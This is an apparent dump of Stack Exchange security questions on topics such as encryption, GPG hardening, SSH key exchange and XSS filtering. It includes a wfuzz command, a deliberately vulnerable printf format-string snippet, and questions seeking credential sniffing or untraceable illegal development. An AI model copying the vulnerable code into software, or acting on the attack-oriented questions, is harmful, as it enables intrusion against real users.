2) Why can't we use a short-lived token of our own along with the API key and validate that token in a resolver? This would bring in some dynamism, as the token is short-lived, so even if somebody hacks and gets this token, by the time a replay happens the token has already expired.

+ +

3) The previous manual token approach seems similar to using an IAM role for authorization. How much safer would it be to use Amazon Cognito's IAM auth roles for this than a manual token approach? Does the SigV4 standard used by AWS help in any way here?

+",224363,,,,,1/3/2020 10:38,AWS Appsync authorization - why is IAM authorization safer than API Key based approach,,0,0,,,,CC BY-SA 4.0 +223629,1,,,1/3/2020 14:10,,1,73,"

UPDATE: Upon further research, I discovered a library that appears to meet my needs, especially with regard to the chunked aspect. Rather than ""roll my own"", I would be better served to use this well-established library:

+ +

https://github.com/defuse/php-encryption

+ +
+ +

I have a need to encrypt large files (up to 2GB), while at rest, using an amount of memory that is not a function of the input file size.

+ +

Accordingly, I intend to employ a ""chunked"" approach whereby I read n bytes of the input file, encrypt it, append it to a file pointer, and repeat until the end of the input file is reached. To decrypt, the process would be reversed, in essence.

+ +

I have found what looks to be a fairly reasonable attempt at this:

+ +

https://www.php.net/manual/en/function.openssl-encrypt.php#120141

+ +

But I have several questions/concerns about the author's code:

+ +
    +
  1. Why does the author hash the key and then take only the first 16 bytes of the hash?
  2. +
+ + + +
$key = substr(sha1($key, true), 0, 16);
+
+ +

I thought that perhaps there is a limit to the key length, but passing a key whose length is much greater than 16 characters does not seem to cause an encryption/decryption failure, in which case this seems entirely pointless, if not detrimental to the viability of this function.

+ +

Doesn't this alteration weaken the key considerably by reducing it to a mere 16 bytes derived from an unsalted SHA-1 of the original key?

+ +
    +
  1. Why does the author use the first 16 bytes of the ciphertext as the next initialization vector inside the while loop?
  2. +
+ + + +
$iv = substr($ciphertext, 0, 16);
+
+ +

From what I gather, this is strictly necessary for the chunked approach to work because the IV for each chunk must be known while decrypting, and in this implementation, it is obtained from the previous chunk.

+ +

My understanding is that where CBC ciphers are concerned, the best-practice is for every call to openssl_encrypt() to use a maximally random IV. To that end, would it be better to call openssl_random_pseudo_bytes(16) within each iteration, as the author does initially (outside the loop), and prepend the freshly-generated IV to the chunk? If so, it seems like that would affect the block size/handling such that I would need to make other changes.
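
+ +

For concreteness, the per-chunk variant I am picturing would be roughly this inside the loop (my own sketch, not the linked author's code; the cipher name is just an example):

$iv = openssl_random_pseudo_bytes(16);
+$ciphertext = openssl_encrypt($chunk, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);
+// prepend the fresh IV so decryption can recover it chunk by chunk
+fwrite($out, $iv . $ciphertext);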

+ +

In any case, is the author's approach to generating the IV for each chunk sane? Or should I rework this aspect?

+ +
    +
  1. How problematic is it that this approach does not implement HMAC?
  2. +
+ +

How important is HMAC, given that these files are to be uploaded to a server, encrypted at rest, and then downloaded from the same server? The files are encrypted while in transit via TLS over HTTPS, so I'm not concerned about an adversary compromising their integrity while in transit. The server on which the files reside at rest is ""trusted"" in that I control it, but, of course, that does not mean it couldn't be compromised in some capacity. What are the risks in foregoing HMAC, given my use-case, and is it feasible to implement using a chunked approach?

+ +

Thanks in advance for any feedback!

+",44399,,44399,,1/3/2020 14:32,1/3/2020 14:32,How does one implement chunked CBC encryption safely; is this implementation flawed?,,0,0,,,,CC BY-SA 4.0 +223633,1,223657,,1/3/2020 16:06,,8,1340,"

From my experience, 99%[citation needed] of the time, when you try to log on to a website, and you mistype your password, you get some indication that the login could not proceed due to incorrect information and the password field is cleared out. Usually the username field remains filled in, so you simply have to retype your password.

+ +

In a small fraction of instances, I've found that some websites do not clear out the password field after an incorrect login attempt. Is this a security issue? I can't think of how or why it may be, but I find it odd behavior since the overwhelming practice seems to be to clear the password field. Can this practice be exploited in some way by someone?

+ +

As an addendum, is there some sort of standard that says the password field should be cleared out after an unsuccessful login attempt or is this practice something that most websites have converged on without formalizing anywhere?

+",134100,,,,,1/6/2020 16:01,Clearing password field after an invalid login attempt,,3,5,,,,CC BY-SA 4.0 +223642,1,,,1/3/2020 18:31,,1,281,"

What's the likelihood of a laptop being compromised when it comes directly from a trusted computer store or a large, known computer technology company? Would there be any liability if malware or rookit was discovered?

+ +

What checks / scans would you perform if you wanted to be as sure as possible that it hasn't been compromised?

+",224380,,,,,2/2/2020 20:03,Security of a laptop order,,1,1,,,,CC BY-SA 4.0 +223643,1,223647,,1/3/2020 18:45,,1,170,"

With SSH, most of my servers use ed25519 (the twisted Edwards variant EC) for authentication.

+ +

I was wondering: after authentication with ed25519, does SSH protocol 2 simply use ephemeral/ephemeral ECDH over curve25519 for the session key?

+ +

I can't see what else it's doing unless it converts the ed25519 x,y co-ordinates to curve25519 Montgomery variants to establish the session key.

+ +

Example output verbose is:

+ +
debug1: kex: algorithm: curve25519-sha256
+debug1: kex: host key algorithm: ssh-ed25519
+debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
+debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
+debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
+debug1: Server host key: ssh-ed25519 SHA256:KvJtkvHyH/+oU3VaDDMQbUHIyI9P+LDLv0FqLdrfmEk
+debug1: Host 'ubuntu-prime.local' is known and matches the ED25519 host key.
+debug1: Found key in /Users/john/.ssh/known_hosts:40
+
+ +

My question is, what curve25519 keypairs are being used here?

+",140436,,,,,1/3/2020 19:32,SSH and the ECDH component,,1,0,,,,CC BY-SA 4.0 +223645,1,223719,,1/3/2020 19:24,,3,510,"

The description from Mozilla warns that require-sri-for is obsolete and may be removed at any time.

+ +

The feature seems useful, especially for large websites where it's likely that a developer may forget to include an integrity attribute.
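
+ +

For context, the directive I mean is the one that was documented roughly like this, paired with integrity attributes on the tags; the idea was that a script or style lacking the integrity attribute would be refused (the hash value is a placeholder):

Content-Security-Policy: require-sri-for script style
+<script src='https://cdn.example.com/lib.js' integrity='sha384-...' crossorigin='anonymous'></script>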

+ +

Is there a specific reason this has been deprecated? Is there an alternative feature to use instead?

+",31625,,,,,1/5/2020 14:30,Why is CSP require-sri-for marked as obsolete?,,1,2,1,,,CC BY-SA 4.0 +223658,1,,,1/3/2020 23:02,,0,2434,"

My host machine is running Windows 10. I've installed VirtualBox and use it to run an Ubuntu VM. Inside the VM I use Firefox to do all of my web browsing that doesn't involve entering sensitive data like important passwords, financial data or government id info.

+ +

I use another separate Ubuntu VM for just the following:
+- checking my email and social media
+- shopping from Amazon and Newegg

+ +

On my host (the windows machine) I use the paid version of Bit Defender Total Security to perform regular scans and it is configured to its default settings.

+ +

Finally for banking and logging into government websites, I use a separate (physical) Chromebook, which is exclusively for those purposes and strictly nothing else.

+ +

Is this all a good security practice? Or is it all just a lot of extra work for nothing?

+",224392,,,,,4/14/2021 16:37,Is using virtualbox for web browsing worth it for added security?,,3,2,,,,CC BY-SA 4.0 +223662,1,,,1/4/2020 0:17,,0,19,"

So, imagine that a vulnerable app provides a login interface. This login sends the user's credentials to the app's server to authenticate the user. However, this is done via HTTP and is therefore not secure.

+ +

If I were inside the user's LAN network, I could easily perform a MITM and sniff the traffic and therefore the unencrypted credentials.

+ +

The question is: how can I retrieve the credentials of a specific user, knowing this vulnerability, whilst being outside the network? What kind of practical attack vectors would there be?

+ +
    +
  • One could be a malicious but disguised app on the user's phone which monitors this traffic? (But obviously this would require a way of convincing the user to install this app, and it would also count as being part of the LAN.)
  • +
+",224393,,224393,,1/4/2020 0:24,1/4/2020 0:24,Sniffing Traffic Android App,,0,3,,1/4/2020 1:21,,CC BY-SA 4.0 +223663,1,,,1/4/2020 1:18,,0,175,"

I set up an external drive for data backup (an SD card inside my laptop card slot). In addition, I connect with a cloud drive for offsite backup (an app that I run only when syncing files).

+ +

I always sign in and use my laptop as a 'standard' user. My external drive is set for UAC 'read' privilege only.

+ +

I then set my data sync app to run as admin only - meaning I need to type in the admin password before data can be synced to my external drive and to the cloud.

+ +

Of course I will remain vigilant about keeping OS and apps updated and avoid clicking email links or downloading unsolicited payloads,etc. -- but in case I miss something and a ransomware comes through, will my Win 10 system stop that ransomware from encrypting my external drive?

+",224395,,,,,6/2/2020 6:30,Will this Setup Protect My Data Files from Malware (e.g. Ransomware)?,,2,1,,,,CC BY-SA 4.0 +223666,1,223682,,1/4/2020 4:59,,1,1617,"

I know that you can pass cookies in Wfuzz by using multiple -b parameters like so: wfuzz -w /path/to/wordlist -b cookie1=foo -b cookie2=bar http://example.com/FUZZ

+ +

but I am wondering if you can pass a list of cookies instead of doing them one by one, which takes forever and is inefficient. I have looked everywhere, it seems, but I can't find an answer.
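
+ +

What I was hoping exists is something like FUZZ substitution inside -b, so the cookie values come from a wordlist; I have not been able to confirm that wfuzz supports the keyword there, but it would look roughly like:

wfuzz -w cookies.txt -b session=FUZZ http://example.com/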

+",223896,,,,,6/5/2020 11:36,How do I pass a list of cookies to Wfuzz?,,2,0,,,,CC BY-SA 4.0 +223667,1,,,1/4/2020 5:48,,11,726,"

gpg has some preset default settings, which I assume were selected as a compromise between speed and security. I understand that these are good enough for most people.

+ +

But, in a situation where speed/performance is not an issue, what defaults could be changed to make gpg use stronger parameters and even stronger encryption?

+ +

For example, I have read discussions about the s2k-count default value being not sufficient. I really don't care if my gpg operation takes 50 milliseconds or 200 milliseconds. I would rather err on the side of safety, even if it is overkill.

+ +

Specifically, I would like to use the strongest possible values for the following (an example config is sketched after the list):

+ +
    +
  1. password hashing iterations
  2. +
  3. size of asymmetric key
  4. +
  5. algorithm for symmetric key
  6. +
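
(These are the kinds of options I have seen suggested for ~/.gnupg/gpg.conf; I am not sure they are the right values, which is part of the question:)

s2k-mode 3
+s2k-digest-algo SHA512
+s2k-count 65011712
+personal-cipher-preferences AES256
+cert-digest-algo SHA512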
+ +

What else could be changed from the default values to make gpg more secure?

+ +

I am using gpg (GnuPG) 2.2.12 on Debian Buster.

+",124292,,98538,,1/7/2020 8:20,1/7/2020 8:20,"What gpg defaults can be improved, when performance is not an issue?",,1,3,2,,,CC BY-SA 4.0 +223671,1,,,1/4/2020 12:14,,3,783,"

I am aware that Format String Attacks work by having a vulnerable function which allows the user to read values from the stack using %x and write by using %n.
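
+ +

(The vulnerable pattern I am thinking of is the classic one:)

#include <stdio.h>
+
+void log_message(const char *user_input) {
+    /* vulnerable: the user controls the format string, so %x reads the stack and %n writes memory */
+    printf(user_input);
+}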

+ +

Since one of the goals of a Format String Attack can be to overwrite the address of a function in the Global Offset Table, I was wondering: does StackGuard prevent this?

+ +

I know that StackGuard protects the saved return addresses of functions from being overwritten; however, will it help against a Format String Attack if that attack aims to change the GOT values?

+",224408,,,,,10/17/2020 16:01,Does StackGuard prevent Format String Attacks,,1,0,,,,CC BY-SA 4.0 +223684,1,223781,,1/4/2020 19:12,,3,387,"

I'm debugging some edits I made to hostapd which requires me to capture some beacon frames, but I can only capture them with airodump-ng and not with wireshark.

+ +

I have a Panda PAU09 adapter running on Kali.

+ +

Method #1:

+ +

I fire up airmon-ng and put the Panda into monitor mode. Next I run airodump-ng to find the BSSID and channel of my system running hostapd. Then I run airodump-ng again to capture to a file. I open the CAP file in Wireshark, and there are my beacons. COOL! Exactly what I needed!

+ +

Method #2:

+ +

I put the interface into monitor mode and start Wireshark on that monitor interface. I set the filter to just look for beacons and see tons of them... but none from my AP. I remove the filter and see no traffic at all from the MAC. I even log into the hostAP system to verify the MAC and it is correct. No traffic from that device at all in wireshark, but plenty with airodump.
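
+ +

For reference, roughly what I am running (interface name, channel and MAC are placeholders):

airmon-ng start wlan0
+airodump-ng wlan0mon                                        # find the BSSID and channel of my AP
+airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon  # method #1: this capture contains the beacons
+# method #2: Wireshark on wlan0mon with the display filter
+#   wlan.fc.type_subtype == 0x08 && wlan.addr == AA:BB:CC:DD:EE:FF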

+ +

I'd really like to just use Wireshark.

+ +

Thoughts on how to debug?

+ +

Thanks.

+",121834,,,,,1/7/2020 1:31,"Why does airodump-ng shows 2.4GHz AP beacons, but wireshark does not?",,1,2,,,,CC BY-SA 4.0 +223685,1,,,1/4/2020 19:36,,0,397,"

I bought a used laptop and I'm concerned about the integrity of the firmware on the hardware and bios. I realize these types of malware are very rare.

+ +

1) My question is: if I assume that the BIOS or SSD or NIC firmware is indeed compromised by the previous owner, what are some of the security features that something like Qubes OS will provide me despite this?

+ +

2) I have read that installing AIDE/Tripwire on dom0 at the beginning of a fresh Qubes OS install can be a powerful tool to see whether the BIOS malware infection is going to damage the dom0 and other downstream VMs in any way going forward. Do you think this is useful?

+ +

3) The manufacturer website has downloads for BIOS firmware, SSD firmware, wireless LAN/WAN, etc. My BIOS and other firmware are 1 year out of date. If I update this firmware from Windows, and then wipe Windows from the SSD and start a fresh Qubes OS install, will the firmware stay updated? And will updating also remove potential malware that was previously installed?

+ +

4) What are some good practices for preventing these types of firmware attacks? My system uses TPM 2.0. Is there a guide to get TPM2.0 working with dom0 to check and analyze logs? Is it a good practice to turn off/not update intel ME, disable intel TXT, AMT, and secureboot? Because that is what I did.

+",224428,,,,,1/4/2020 23:27,Used laptop with potential BIOS/SSD firmware malware,,1,1,,,,CC BY-SA 4.0 +223686,1,223687,,1/4/2020 19:38,,1,2078,"

Currently I have a Node JS project that uses the Spotify API. The project displays the users top played artists and tracks. I am following the Authorization Code Flow to obtain the access token. This access token will be used to query certain endpoints to obtain a JSON response of the data that will be used for my project. This token lasts an hour. I am currently storing this access token in a cookie and using this cookie to make new requests.

+ +

My question is: is this acceptable from a security standpoint? This token does not have the ability to change any of the user's profile settings or read sensitive data. However, if another person were able to obtain this token they could use it to see another user's data. Or would it be more secure to store this access token in a database and query the database for access tokens whenever needed?

+",224083,,215709,,1/5/2020 12:19,1/5/2020 12:19,Storing third party API tokens in a database,,1,0,,,,CC BY-SA 4.0 +223688,1,223691,,1/4/2020 21:16,,18,4804,"

This question was prompted by a recent visit to a certain site that provides (apparently for GDPR reasons) a table with all of your data, including part of your hashed password. I understand this poses no problem in this case (as you would have to be logged in to see this table), but what if this data was made public?

+ +

To rephrase more clearly: does revealing part of your password hash (including the hash length) make password cracking (via bruteforce or any other method) any simpler or more efficient than before?

+",224431,,224431,,1/6/2020 18:49,1/10/2020 17:52,Does revealing part of your hash give an attacker advantage when attacking your password?,,3,9,3,1/6/2020 18:59,,CC BY-SA 4.0 +223689,1,223692,,1/4/2020 21:37,,1,230,"

They say that the last Tor node presents all the information in the clear.

+ +

If I want to send some sensitive information over Tor, could I encrypt it myself first, so that it is protected both by the Tor nodes' encryption and by my own encryption?
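
+ +

For example, encrypting the payload to the recipient before it ever enters Tor (the address is just a placeholder), the idea being that the exit node only ever sees ciphertext:

gpg --encrypt --recipient friend@example.com secret.txt
+# send the resulting secret.txt.gpg over Tor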

+ +

Is this possible?

+",224059,,86735,,1/4/2020 21:44,1/4/2020 22:07,Encrypt data within the TOR network,,1,7,1,,,CC BY-SA 4.0 +223693,1,223704,,1/4/2020 23:22,,5,333,"

My goal is to develop a piece of software which is illegal in my country. Obviously I don't want anyone to be able to trace the code back to me or prove that I developed it after deployment. What precautions would be needed? Which pitfalls need to be avoided? Is there a tutorial?

+ +

I would suspect that full drive encryption on your development machine and internet connectivity over Tor are required.

+ +

What setup would be needed when developing in countries with political repression or similar conditions?

+",224435,,10863,,1/4/2020 23:59,1/5/2020 7:49,Untraceable software development,,1,5,1,,,CC BY-SA 4.0 +223699,1,223702,,1/5/2020 2:00,,1,267,"

Before you immediately comment ""you can't trust the client!"", please read the whole question.

+ +

I've been reading about how to prevent XSS attacks lately, and everything I've found says that the server should sanitize the data that will be put into the webpage. This would basically look like addToDatabase(filter(userResponse)). Then the client can safely display anything that it gets from the server.

+ +

I was wondering if it would be safe to store the potentially unsafe data on the server, and have the client filter it when it is received, like addHTML(filter(serverResponse)). This would stop the data from being executed client-side, so no XSS would take place. I understand that anyone could simply remove that filter, however all that would do is make them vulnerable. Since other clients would filter anything sent to them, a malicious client could only disable their own filter and mess up themselves. (I'm not talking about SQL injection prevention; that would obviously have to be server-side.)
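
+ +

By 'the client filters it', I mean something along these lines (a sketch; container is whatever element the data is displayed in):

// escape-on-output: insert server data as text, never as markup
+const item = document.createElement('div');
+item.textContent = serverResponse;   // the browser will not parse this as HTML
+container.appendChild(item);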

+ +

To summarize: The server doesn't sanitize, but the clients sanitize whatever they receive.

+ +

Would this be safe?

+",179871,,,,,1/5/2020 5:23,Preventing XSS by filtering data from the server to the client,,2,0,1,,,CC BY-SA 4.0 +223700,1,,,1/5/2020 2:24,,0,159,"

I am working to set up OpenVPN access to my home network. To do this, I had to contact my ISP, because they had the necessary port blocked at the Gateway/Router that I do not have access to.

+ +

In my house, I have a Google WiFi system.

+ +

They put the provided Gateway in Bridge mode, instead of Router mode. This solved my problem, but when I ran an nmap against my public IP afterwards, a great number of ports (including vulnerable ones) were now listed as ""open"".

+ +

My question is, since I have the router in the house, and I have it set up to block all ports I have not configured to forward, is there any real risk here, having the ports showing as open at the Gateway?

+",194748,,,,,1/5/2020 2:24,Open Ports at ISPs Gateway,,0,2,,,,CC BY-SA 4.0 +223706,1,,,1/5/2020 10:33,,2,317,"

Given the plethora of random password generators (RPG) available, I'd like to do some black box testing on some.

+ +

Let's take https://passwordsgenerator.net/ for example. Assuming the whole generator is a black box with 0 information about how the passwords are generated (can't even view the .js stuff), and all we have is a ""Generate password"" button that somehow outputs a seemingly random password each time it's clicked.

+ +

We do NOT know:

+ +
    +
  • Who made or hosts the RPG
  • +
  • What algorithms are used to generate the password
  • +
  • How they get the randomness (Atomic decay? Lava lamps? Monkeys on typewriters? People trying to exit Vim?)
  • +
  • Source code.
  • +
+ +

What we know:

+ +
    +
  • If you click ""Generate password"", you get a seemingly random password
  • +
+ +

We can get thousands or millions of passwords as testing data. Given just those passwords, can we analyze them to figure out (or even just estimate) how cryptographically secure the RPG is?
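As a very rough illustration (my own sketch, assuming the generated passwords have been collected one per line into a file named passwords.txt), simple statistics can at least reject an obviously bad generator: duplicates, biased characters, biased positions. Passing such checks proves nothing about cryptographic quality, though.

import collections, math

with open('passwords.txt') as f:
    pws = [line.strip() for line in f if line.strip()]

# exact repeats are a red flag for any CSPRNG-backed generator
print('duplicate passwords:', len(pws) - len(set(pws)))

# overall character frequency / entropy estimate
counts = collections.Counter(''.join(pws))
total = sum(counts.values())
entropy = -sum((c / total) * math.log2(c / total) for c in counts.values())
print('per-character entropy: %.2f bits (max %.2f for this charset)'
      % (entropy, math.log2(len(counts))))

# crude positional bias check
for i in range(min(len(p) for p in pws)):
    col = collections.Counter(p[i] for p in pws)
    ch, freq = col.most_common(1)[0]
    if freq / len(pws) > 5 / len(counts):
        print('position %d looks biased toward %r' % (i, ch))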

+ +

(I'm not looking for processes thorough enough to generate whole reports and research papers. I'm just thinking of a way ordinary people can do a ""quick"" and rough test on an RPG, maybe to choose between the common RPGs.)

+",206331,,,,,1/6/2020 13:38,How can one test if a password generator is cryptographically secured?,,3,5,,,,CC BY-SA 4.0 +223707,1,,,1/5/2020 10:40,,1,106,"

When looking at entitlements on pycharm CE for macOS, it shows many serious security exceptions. Here are its entitlements:

+ +
<dict>
+        <key>com.apple.security.cs.allow-jit</key>
+        <true/>
+        <key>com.apple.security.cs.allow-unsigned-executable-memory</key>
+        <true/>
+        <key>com.apple.security.cs.allow-dyld-environment-variables</key>
+        <true/>
+        <key>com.apple.security.cs.disable-library-validation</key>
+        <true/>
+        <key>com.apple.security.cs.disable-executable-page-protection</key>
+        <true/>
+</dict>
+
+ +

Why does PyCharm use such lax security? Is it necessary?

+ +

I tried to look into pycharm's source code, and I saw this commit:

+ +
+

Add macOS notarization script

+ +

GitOrigin-RevId: e8779699a5c41df82848b335a3aed82b7550c7eb

+ +

VladRassokhin authored and intellij-monorepo-bot committed on Jun 5, + 2019 commit 631c91b

+
+ +

c1a579488452da099b957305502cda2f4

+ +

But I couldn't find a clear reason why PyCharm would need these security gaps. Can anyone with knowledge of PyCharm's code shed light on this?

+",143641,,,,,1/5/2020 10:40,Why does pycharm uses lax security on macOS?,,0,0,,,,CC BY-SA 4.0 +223713,1,,,1/5/2020 12:41,,5,301,"

Given a setup where we have nginx sat in a DMZ serving static content, forwarding (REST/WS) requests through a firewall to tomcat running on a server where other applications are also running:

+ +
YOU <> [FW:443] <> (NGINX) <> [FW:8443] <> (TOMCAT)
+                                           ( APP1 )
+                                           ( APP2 )
+                                           (  DB  )
+
+ +

Can I focus on just the nginx & Tomcat applications in terms of patching CVEs/vulnerable dependencies, or must I ensure that all other applications are as 'CVE-free' as possible?

+ +

I believe this is different to this question about whether applications behind a public firewall need to be patched.

+",224450,,,,,1/1/2022 18:07,"Fix vulnerabilities in ALL applications, or only client-facing ones?",,3,4,,,,CC BY-SA 4.0 +223718,1,223746,,1/5/2020 13:55,,4,887,"

When a mobile app is sending HTTPS requests, it verifies the server certificate against some kind of certificate store. My question is, would that certificate store be provided by the phone's OS, or would it be packed with the app?

+ +

I know I can do certificate pinning, but first I want to know what's the default.

+ +

If there's any difference between Android and iOS, I'd want to know that.

+",16116,,,,,1/6/2020 8:59,Do mobile apps have their own certificate store?,,1,0,1,,,CC BY-SA 4.0 +223720,1,,,1/5/2020 14:57,,0,119,"

If we use both a desktop VPN client and a Chrome VPN extension, or if we use just the browser's VPN extension,

+ +

does the ISP see which websites/links we visit?

+",224457,,,,,1/5/2020 15:04,Can ISPs see which website we visit when we use desktop VPN client and browser VPN extension?,,1,0,,1/14/2020 23:14,,CC BY-SA 4.0 +223721,1,,,1/5/2020 15:04,,0,109,"

I assume the state is not 4 GB, but that there's a 32-bit counter and it mixes like in ChaCha. What's the point of producing those 4 GB if there's no entropy to justify it? What I mean is that if the first 1024 bits are the same, so would be the rest of the 4 GB, so why even offer the option?

+",208898,,,,,1/5/2020 15:04,How can Blake2X produce 4gb digests?,,0,2,,,,CC BY-SA 4.0 +223726,1,223728,,1/5/2020 19:08,,0,148,"

Exposing primary keys is bad practice. How should I expose UUID or BIGSERIAL Primary Keys to clients — hashing, encoding, encrypting? For integers there are libraries like hashids, what about UUID?
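For the integer (BIGSERIAL) case, a small sketch with the hashids Python package; the salt and id are made up, and note this is obfuscation rather than encryption. A version-4 UUID is already random, so exposing it does not leak ordering or row counts the way a sequential integer does.

from hashids import Hashids   # pip install hashids

hashids = Hashids(salt='some-app-secret', min_length=8)

public_id = hashids.encode(12345)            # short obfuscated string for URLs/APIs
internal_id = hashids.decode(public_id)[0]   # back to 12345 on the server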

+",222160,,,,,1/5/2020 19:56,Exposing UUID or BIGSERIAL Primary Keys,,1,0,,,,CC BY-SA 4.0 +223729,1,,,1/5/2020 20:18,,2,850,"

How do you prevent someone from performing a TCP reset attack between a client and a host without having access to the host?

+ +

I am trying to solve a CTF for fun and learning purposes. In one of the challenges I establish a connection with a server that starts sending me TCP packets, but I am interrupted by a third party that sends what appears to be a forged TCP reset. I receive a RST, ACK and the packets stop coming.

+ +

I have tried both DROPping and REJECTing the RST packet without success, using the following command:

+ +
iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP
+
+ +

Is there any way that I could nullify the attacker who is trying to prevent communication between me and the host?

+",224467,,90657,,1/7/2020 1:35,1/7/2020 7:37,TCP reset attack / forged TCP reset prevention,,0,6,1,,,CC BY-SA 4.0 +223730,1,223745,,1/5/2020 20:59,,1,454,"

KeePassX lets you decide how many transformation rounds need to be run in order to unlock your KeePass database. In my version of KeePassX (2.0.3) the max value seems to be 999,999,999. With that setting it takes my laptop about 22 seconds to unlock the database. I imagine that a beefy workstation would take less time than that. With that in mind, how well can this setting deter someone else from accessing your database, assuming that they managed to get access to it? Let's just say an individual (not an organization) with a computer made to do this kind of work. How much work can you assume they will have to do per try with the kind of computing power they will have access to in twenty years?
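A back-of-envelope way to frame the question; every number below is an assumption to be adjusted, not a claim about real attacker hardware.

# Assumptions: how much faster the attacker is than the laptop today, and how
# quickly hardware keeps improving over the next twenty years.
seconds_per_try_laptop = 22
attacker_speedup_today = 100          # dedicated hardware / GPUs (assumed)
doubling_period_years  = 2            # Moore's-law-style growth (assumed)
years                  = 20

seconds_per_try_future = seconds_per_try_laptop / (
    attacker_speedup_today * 2 ** (years / doubling_period_years))

print('seconds per try in %d years: %.6f' % (years, seconds_per_try_future))
print('time for a 1e6-entry guess list: %.1f hours'
      % (1_000_000 * seconds_per_try_future / 3600))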

+",224469,,,,,1/6/2020 8:02,How well will the max transformation rounds in Keepassx deter an attacker for the next twenty years?,,2,4,1,,,CC BY-SA 4.0 +223731,1,,,1/5/2020 23:57,,1,476,"

I self-host my mail server and earlier downloaded a SpamAssassin corpus from http://artinvoice.hu/spam to get a head start on the Bayes learning.

+ +

The artinvoice.hu site is down and has been for weeks.
+Are there any known good alternatives?

+",224474,,,,,1/25/2020 20:05,Spamassassin public corpus,,2,0,1,1/25/2020 20:16,,CC BY-SA 4.0 +223732,1,223741,,1/5/2020 23:59,,2,464,"

I've read that pre-shared keys (PSKs) are symmetric keys shared in advance among communicating parties but have found no explanation as to how the TLS client and server agree upon the value of the PSK. How is this done?

+",224476,,138516,,1/6/2020 5:27,1/6/2020 8:34,How are PSKs agreed upon by the TLS server and client?,,2,5,3,,,CC BY-SA 4.0 +223737,1,223868,,1/6/2020 4:23,,67,44605,"

Just before Christmas I received the following message in one of my GMail accounts:

+ +
+

Sign-in attempt was blocked
+ ********@gmail.com [redacted by me]

+ +

Someone just used your password to try to sign into your account. Google blocked them, but you should check what happened.

+
+ +

I signed into that account and looked at the activity (not by clicking the link in the message, of course) and indeed there was a sign in attempt blocked from the Philippines.

+ +

I gather this means that an attacker entered the correct user name and password for my account, but was likely blocked because they couldn't pass the MFA challenge. Or maybe Google's fraud detection is actually decent and it knows I've never been to the Philippines? Either way, I immediately changed the password and (as far as I know) the attacker didn't gain control of the account.

+ +

However, in the 2 weeks since then, I have received several email verification requests from various online services that I never signed up for -- Spotify, OKCupid, a Nissan dealership in Pennsylvania (that one's interesting), and a few others I've never heard of before. Someone out there is actively using my GMail address to enroll for these services.

+ +

The account in question is not my main account, and while the password on it was admittedly weak, it was also unique (I never used it on anything else). I changed it to a password that's much stronger now.

+ +

Should I be concerned about this?

+ +

Also, if the attacker didn't gain control of the account, why use it to enroll in all these services?

+",171798,,,,,10/30/2021 23:28,My email address is being used to enroll for online services. Should I be concerned?,,5,13,7,,,CC BY-SA 4.0 +223740,1,,,1/6/2020 7:18,,1,3124,"

I posted a question similar to this one on Stack Overflow, but that has not produced any answers so far, so I'm hoping someone here will be able to help me out.

+ +

Somewhat simplified, I'm trying to do a POST request via https using Postman (later I'm hoping to reproduce it in PL/SQL under Oracle using UTL_HTTP), but I'm having some certificate-related issues. I have a specific url I'll be trying to reach later, but for testing purposes, I've been using a webhook url just to verify that I could make calls out at all.

+ +

I am able to perform a post request to a https-address if I disable SSL Certificate Verification under the Postman settings - so it's apparently possible to reach an outside url, so long as I don't care about the validity of the certificates used.

+ +

Proxy issues
I think my problems are due to the fact that I'm behind a proxy at the organization I'm currently working for. If I look at the certificate path for the cert for webhook.site, for instance, it looks like the following, where the grayed-out parts of the cert names are names related to the organization.

+ +

+ +

The result of this is that when I try to perform https POST requests to webhook without disabling cert verification, it fails with the following error shown in my Postman console:

+ +
+

Error: unable to verify the first certificate.

+
+ +

Attempted solutions
+A couple of things I've experimented with to try to solve this:

+ +
    +
  • Importing and adding any or all of the certs from the certification path shown above into my cert store.
  • +
  • Importing the certs into Postman (under Settings > Certificates) - although I'm far from certain that I've done this correctly, or if this is even the right way to go about it.
  • +
+ +

My hunch is that I just need to get the correct certificate installed in the correct place in order for this to work. The problem is I can't figure out which certificate that should be in this case (or where it should be installed for that matter, though I would assume that adding it under trusted root certificates in the system cert store should suffice?).

+ +

Are these assumptions correct? Any tips on how I can figure out exactly which certificate I'm actually missing?
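One way to narrow it down (my own sketch, and only if a direct connection from your network is possible): fetch the certificate the proxy actually presents and look at its issuer, since that issuer is the CA certificate the trust store or Postman still needs. The host name is just the example from above.

import ssl
from cryptography import x509   # pip install cryptography

pem = ssl.get_server_certificate(('webhook.site', 443))   # no verification, leaf only
leaf = x509.load_pem_x509_certificate(pem.encode())
print('subject:', leaf.subject.rfc4514_string())
print('issuer :', leaf.issuer.rfc4514_string())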

+",42360,,,,,9/27/2021 11:03,How to identify which certificate I'm missing to produce HTTPS calls?,,1,0,1,,,CC BY-SA 4.0 +223749,1,223750,,1/6/2020 10:02,,3,173,"

I'm looking into mutual TLS authentication for a B2B API. Is it possible to use mutual TLS authentication using X.509 certificates while relying on Public CAs?

+ +

I see that some Public CAs (from CA/Browser Forum) offer signed ""client authentication"" certificates. What fields can I rely on in this case? Would I be able to just map the Subject Name to a user in my application and trust the CA/Browser bundle?

+ +

Can ""Public CA 1"" guarantee that ""Public CA 2"" will not sell the exact same certificate to a different company?

+",31030,,,,,1/7/2020 13:32,Client Certificates from Public Certificate Authorities,,2,0,1,,,CC BY-SA 4.0 +223752,1,,,1/6/2020 11:28,,1,151,"

Just reviewing some logs and I am seeing local scans to several local IP addresses on port 137 within my network. The source IP however is the broadcast IP of the VLAN (.255).

+ +

I have checked the logs and I can see the broadcast IP trying to initiate udp 137 connections on several other IP addresses of the same subnet.

+ +

Many of the errors being shown are ""The Windows Filtering Platform has blocked a connection"".

+ +

I cant really make sense of the Source IP address being the broadcast IP. Has anyone come across this before please? and from your experiences, where should I be looking that I could have missed? Thanks.

+",197502,,,,,1/26/2022 0:03,Local Scans initiated from a VLAN Broadcast IP address,,1,2,1,,,CC BY-SA 4.0 +223753,1,,,1/6/2020 11:57,,1,198,"

Veracode is reporting a security issue on a piece of code which seems pretty innocuous to me. The code is built with python/Django and the line in question is:

+ +
+

return render(request, 'core/create-user.html', context)

+
+ +

The render shortcut for django is pretty standard and it expects a request object, name of template and context to be passed to template. I am not sure why Veracode is complaining for this.

+ +

